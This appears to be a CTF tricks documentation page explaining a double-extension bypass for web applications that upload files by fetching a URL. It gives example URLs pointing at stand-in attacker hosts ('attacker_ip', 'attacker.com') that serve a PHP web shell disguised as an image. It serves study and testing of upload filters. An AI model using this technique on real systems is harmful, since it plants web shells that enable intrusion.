> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/bypass/file-upload/trick-0219.md).

# Remote File Fetch Extension Bypass

***

Exploit web applications that allow file uploads via URL fetch by leveraging how they process filenames. If the server validates the extension based on the end of the provided URL but fetches or saves the file using the base name, you can append a permitted extension to your malicious file's URL. This is sometimes referred to as a double extension bypass.

Host your malicious file (e.g., `shell.php`) on your attacker-controlled HTTP server. Provide a URL to the target application like this, appending a permitted extension (e.g., `.png`) to your malicious file's name:

```
http://<attacker_ip>/shell.php.png
```

The server might validate the `.png` extension as allowed but fetch and save the file as `shell.php`, bypassing the image-only filter. The application checks the extension `.png`, which is allowed. However, when saving the file, it might extract the filename incorrectly, resulting in the file being saved as `shell.php`. If the server receives the file name `shell.php.png`, some server configurations or web applications may process the file as `shell.php`, effectively ignoring the `.png` extension validated. Observe server logs to confirm the base file name is fetched. Attackers can host a malicious file with a double extension on their server, such as `shell.php.jpg`, and provide the URL `http://attacker.com/shell.php.jpg` to the application. The server may only check for the extension at the end of the file name, allowing an attacker to upload a file like `file.php.gif`.
